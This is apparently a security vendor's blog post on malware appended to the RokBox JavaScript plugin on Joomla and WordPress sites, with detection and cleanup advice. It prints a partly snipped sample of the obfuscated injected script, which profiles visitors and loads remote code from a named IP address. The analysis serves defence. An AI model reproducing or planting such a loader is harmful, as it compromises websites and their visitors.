• RokBox.js Infections

    Today’s websites make use of many third party plugins to add new functionality with the least amount of effort. The inclusion of these third party plugins brings significant additional risk, namely the introduction of vulnerabilities to one’s website through vulnerabilities in the plugin itself.

    A prime example of this is the Timthumb malware outbreak that we discovered some time ago. In this post, we will discuss the malware infecting another third party plugin, RokBox. At this time, we have not seen very many websites with this issue, so we do not know if a vulnerability in RokBox is the root cause of the infection. However, the malware code we discuss has been found on Joomla and WordPress sites where the RokBox plugin is installed.

    What does a third party plugin do?
    Third party plugins allow websites to include new functionality without much effort on the part of the website owner. They can improve the management and display of images, allow the insertion of audio and video players, and in general improve the user experience.

    Additionally, third party plugins are very popular among website administrators and designers because they allow good looking websites with advanced capabilities to be launched rapidly.

    What is RokBox?
    According to the RocketTheme website, on which RokBox is hosted, RokBox “is a mootools powered JavaScript slideshow that allows you to quickly and easily display multiple media formats including images, videos (video sharing services also) and music.” It also provides a theme management system that allows website owners to create their own custom themes and manage them. It is a successor to the RokZoom plugin. RokBox is very popular with administrators of Joomla websites.

    More details about RokBox: Joomla Extensions – RokBox.

    How do I identify the malicious code?
    The malware is appended at the very end of the benign RokBox JavaScript (Dean Edwards packed). The malware loads additional malware from the IP address 91.196.216.64, which is based in Russia.

    A sample of the actual malware is shown below:

    var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\
    [snipped]
    x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;
    

    A sample of the benign RokBox code is shown below:

    /**
    * RokBox System Plugin
    *
    * @package		Joomla
    * @subpackage	RokBox System Plugin
    * @copyright Copyright (C) 2009 RocketTheme. All rights reserved.
    * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see RT-LICENSE.php
    * @author RocketTheme, LLC
    *
    * RokBox System Plugin includes:
    * ------------
    * SWFObject v1.5: SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
    * http://www.opensource.org/licenses/mit-license.php
    * -------------
    * JW Player: JW Player is (c) released under CC by-nc-sa 2.0:
    * http://creativecommons.org/licenses/by-nc-sa/2.0/
    *
    */
    
    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};
    

    Is my site infected?
    To find out if your site is infected, search for the strings “_0xdc8d”, “refurl”, and “\x63” all in the same file. You can use tools like grep or wingrep to help you. Further, make sure that all of your plugins and your WordPress or Joomla installations are up to date. It is a good practice to change all your access passwords as well to ensure your security.

    How should I protect my site
    Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

    StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

    Till next time…